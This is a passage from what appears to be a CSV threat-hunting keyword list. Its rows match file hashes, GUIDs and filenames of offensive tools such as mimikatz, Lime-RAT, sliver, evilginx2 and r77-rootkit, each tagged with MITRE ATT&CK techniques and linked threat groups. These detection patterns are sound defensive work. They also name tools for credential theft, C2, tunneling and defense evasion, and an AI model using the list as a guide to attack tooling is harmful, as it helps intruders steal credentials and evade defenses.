Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","33584" "*aeed8e92b0e9d7e4c9602476183d611ed9aa2db760e349eb6226dcadb2b0df80*",".{0,1000}aeed8e92b0e9d7e4c9602476183d611ed9aa2db760e349eb6226dcadb2b0df80.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","33585" "*aef6547e-3822-4f96-9708-bcf008129b2b*",".{0,1000}aef6547e\-3822\-4f96\-9708\-bcf008129b2b.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","33586" "*aef6ce3014add838cf676b57957d630cd2bb15b0c9193cf349bcffecddbc3623*",".{0,1000}aef6ce3014add838cf676b57957d630cd2bb15b0c9193cf349bcffecddbc3623.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - 
TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","33587" "*aef6ce3014add838cf676b57957d630cd2bb15b0c9193cf349bcffecddbc3623*",".{0,1000}aef6ce3014add838cf676b57957d630cd2bb15b0c9193cf349bcffecddbc3623.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - 
menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","33588" "*aefa7d3dbf23503f8bfb9c31c922e735977d1101fa52e71502ff65e67f8f07ae*",".{0,1000}aefa7d3dbf23503f8bfb9c31c922e735977d1101fa52e71502ff65e67f8f07ae.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","33589" "*Aegrah/PANIX*",".{0,1000}Aegrah\/PANIX.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","1","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","33591" "*aem2john.py*",".{0,1000}aem2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","33592" 
"*AERTSW50ZXJuYWxzXHg4Nlx2Y3J1bnRpbWUxNDBfdGhyZWFkcy5kbGxQSwECFAAUAAAACAAnnY1YrbP4grERAAA9RQAADwAAAAAAAAAAAAAAAABk7yEARFNJbnRlcm5hbHMuY2F0UEsFBgAAAAAwADAAdRAAAEIBIgAAAA==*",".{0,1000}AERTSW50ZXJuYWxzXHg4Nlx2Y3J1bnRpbWUxNDBfdGhyZWFkcy5kbGxQSwECFAAUAAAACAAnnY1YrbP4grERAAA9RQAADwAAAAAAAAAAAAAAAABk7yEARFNJbnRlcm5hbHMuY2F0UEsFBgAAAAAwADAAdRAAAEIBIgAAAA\=\=.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","0","#base64","base64 rubeus","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","33602" "*aes*83fb558645767abb199755eafb4fbc5167113da8ee69f13267388dc3adcdb088*",".{0,1000}aes.{0,1000}83fb558645767abb199755eafb4fbc5167113da8ee69f13267388dc3adcdb088.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","#filehash","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","33603" "*AES_cryptor.py *",".{0,1000}AES_cryptor\.py\s.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","33604" "*aes_enc_peass(peass_script)*",".{0,1000}aes_enc_peass\(peass_script\).{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","33605" "*AesEncryptor.py*",".{0,1000}AesEncryptor\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","33606" "*af0620ad11ab2327d91c65e3d5feabe08e2bc7bbc11099322f5eb4c7f302c4ba*",".{0,1000}af0620ad11ab2327d91c65e3d5feabe08e2bc7bbc11099322f5eb4c7f302c4ba.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","33608" "*AF0885E4-9E3B-49CA-9F13-0F869E8BF89D*",".{0,1000}AF0885E4\-9E3B\-49CA\-9F13\-0F869E8BF89D.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","33609" "*AF10B9C3-7969-4971-BD7A-5C50D8D2547F*",".{0,1000}AF10B9C3\-7969\-4971\-BD7A\-5C50D8D2547F.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - 
T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","33611" "*af11238c0d014ce83d4320d8b4a0b664b920dadebb2dcbffcaba067b2a1e61bd*",".{0,1000}af11238c0d014ce83d4320d8b4a0b664b920dadebb2dcbffcaba067b2a1e61bd.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","33612" "*af125299039eca4bdc0b43b65aec3fb54c62a48b6f8bcf1bb07a0a1e95241c23*",".{0,1000}af125299039eca4bdc0b43b65aec3fb54c62a48b6f8bcf1bb07a0a1e95241c23.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33613" "*af190cf0778fc031a0db2eb2e36aaa0a09dea5495ce8a50d6e3eee439db3dc7a*",".{0,1000}af190cf0778fc031a0db2eb2e36aaa0a09dea5495ce8a50d6e3eee439db3dc7a.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","33615" "*AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB*",".{0,1000}AF2D318C\-2C5A\-4C9D\-BE4C\-AA5B3E8037DB.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#GUIDproject","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","33619" "*af2d9062b7788fc47385d8c6c645dfa0*",".{0,1000}af2d9062b7788fc47385d8c6c645dfa0.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","33620" "*af2f2426e9f2614350859b5bc05cf72138e5a5fbc8dc06f22c12b929deaf340a*",".{0,1000}af2f2426e9f2614350859b5bc05cf72138e5a5fbc8dc06f22c12b929deaf340a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","33621" "*af37338c3451aa6794a1fb6111c22cc9931d3a0d97cd9aa8326702d8ac87ac07*",".{0,1000}af37338c3451aa6794a1fb6111c22cc9931d3a0d97cd9aa8326702d8ac87ac07.{0,1000}","offensive_tool_keyword","PrivFu","execute process as NT SERVICE\TrustedInstaller group account","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","TrustExec","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","33623" "*af42a17d428c8e9d6f4a6d3393ec268f4d12bbfd01a897d87275482a45c847e9*",".{0,1000}af42a17d428c8e9d6f4a6d3393ec268f4d12bbfd01a897d87275482a45c847e9.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","33624" "*af47f458fabf670417c688d3b25cdbd4ff7a4f34530b2af273a578e2a95ae697*",".{0,1000}af47f458fabf670417c688d3b25cdbd4ff7a4f34530b2af273a578e2a95ae697.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information 
gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","33626" "*af5953a63d8030e45758873c4fc3deb688e800caca48b5dcaf3fc7fca6aa9ade*",".{0,1000}af5953a63d8030e45758873c4fc3deb688e800caca48b5dcaf3fc7fca6aa9ade.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","33627" "*af5c3a5f68323ac68b258dae37c20e48f594118d08479f92a78bd54d26debd9a*",".{0,1000}af5c3a5f68323ac68b258dae37c20e48f594118d08479f92a78bd54d26debd9a.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","33630" "*af61365c5ecb82162a79a74e76ab1711e8f85c4fcdcd9b7fee76e8e590050d53*",".{0,1000}af61365c5ecb82162a79a74e76ab1711e8f85c4fcdcd9b7fee76e8e590050d53.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","33631" 
"*af6678b4085b9c309c3c6f2977426aa104f796b083572d67cd1a71b8076af28d*",".{0,1000}af6678b4085b9c309c3c6f2977426aa104f796b083572d67cd1a71b8076af28d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","33632" "*af6d177df40fcf715f752557c9fd2483a5e194c1c468625a76a4862632db5cb6*",".{0,1000}af6d177df40fcf715f752557c9fd2483a5e194c1c468625a76a4862632db5cb6.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#filehash","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","33633" "*af719967446404b4dde33dd813806650b52c51e89d4752995d507b5ba1d1b649*",".{0,1000}af719967446404b4dde33dd813806650b52c51e89d4752995d507b5ba1d1b649.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","33635" "*af751c690671ffc0da6380ef94a25df3dfc5911c448319f7f6b90df55cca7b7d*",".{0,1000}af751c690671ffc0da6380ef94a25df3dfc5911c448319f7f6b90df55cca7b7d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","33636" 
"*af763332f70cf0137ebcb1d237e55a00c6fc0698982fec44fb012db4cb1be5df*",".{0,1000}af763332f70cf0137ebcb1d237e55a00c6fc0698982fec44fb012db4cb1be5df.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","0","#filehash #linux","N/A","10","10","3940","644","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z","33638" "*AF7F4404-C746-43EC-86EA-8405473C95C9*",".{0,1000}AF7F4404\-C746\-43EC\-86EA\-8405473C95C9.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#GUIDProject","N/A","9","","N/A","","","","33640" "*af8f26e8a970e480790b6c09289d3ab4a2dbf6097b3ac5dac323ac9ea433531a*",".{0,1000}af8f26e8a970e480790b6c09289d3ab4a2dbf6097b3ac5dac323ac9ea433531a.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","33643" 
"*af91c925c3a6ba14dea50a5d24593c48cc02e7bfc23b7a02eaf59dd55c3ae6cd*",".{0,1000}af91c925c3a6ba14dea50a5d24593c48cc02e7bfc23b7a02eaf59dd55c3ae6cd.{0,1000}","offensive_tool_keyword","DecryptRDCManager","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/mez-0/DecryptRDCManager","1","0","#filehash","N/A","8","1","73","7","2020-09-29T10:12:58Z","2020-09-29T08:53:46Z","33644" "*AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9*",".{0,1000}AF9C62A1\-F8D2\-4BE0\-B019\-0A7873E81EA9.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tool","https://github.com/med0x2e/GadgetToJScript","1","0","#GUIDproject","N/A","10","10","942","168","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z","33645" "*afabb213499036eb1aa379aa91c62bedb75f085dd3962b90638a65bea1fc5d25*",".{0,1000}afabb213499036eb1aa379aa91c62bedb75f085dd3962b90638a65bea1fc5d25.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33648" 
"*afac742aefab4af6b076dc05c93eae9d329d0d89d97a098a48217013ee8761e6*",".{0,1000}afac742aefab4af6b076dc05c93eae9d329d0d89d97a098a48217013ee8761e6.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","33649" "*afb4d1a05a4b0b47692debfbe57946caa4bfaa2ba18b121bcfe143bf567186be*",".{0,1000}afb4d1a05a4b0b47692debfbe57946caa4bfaa2ba18b121bcfe143bf567186be.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","33650" "*afb55dc8b4bcff758082efde93e5ca9c2a6a725b16a4c82e7675393bf46fecfd*",".{0,1000}afb55dc8b4bcff758082efde93e5ca9c2a6a725b16a4c82e7675393bf46fecfd.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","33651" "*AFB848D0-68F8-42D1-A1C8-99DFBE034FCF*",".{0,1000}AFB848D0\-68F8\-42D1\-A1C8\-99DFBE034FCF.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - 
TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","33653" "*afbb31d1093a2da538a7179a04ccb87bebdc041734314f027ff0c3d2bec04cfe*",".{0,1000}afbb31d1093a2da538a7179a04ccb87bebdc041734314f027ff0c3d2bec04cfe.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","33654" "*afbcbjpbpfadlkmhmclhkeeodmamcflc*",".{0,1000}afbcbjpbpfadlkmhmclhkeeodmamcflc.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","33655" "*afc4be6010ca93ce9fbd373bb9795be61db66b236201236d7193934970926b6c*",".{0,1000}afc4be6010ca93ce9fbd373bb9795be61db66b236201236d7193934970926b6c.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","33657" "*afca48a465dd8ee9d44677c4ebb9d71fc66adae3686dbff6b3eb139ef2306f7a*",".{0,1000}afca48a465dd8ee9d44677c4ebb9d71fc66adae3686dbff6b3eb139ef2306f7a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","33659" "*afd28d12d55e823076544802e23776a6150aa3095f8c9b5904cf35af8d258186*",".{0,1000}afd28d12d55e823076544802e23776a6150aa3095f8c9b5904cf35af8d258186.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","33660" "*afd2db12ce75a9ed350e7c04ab79ae018de33f9b994a7347e2a530755081d2cd*",".{0,1000}afd2db12ce75a9ed350e7c04ab79ae018de33f9b994a7347e2a530755081d2cd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective 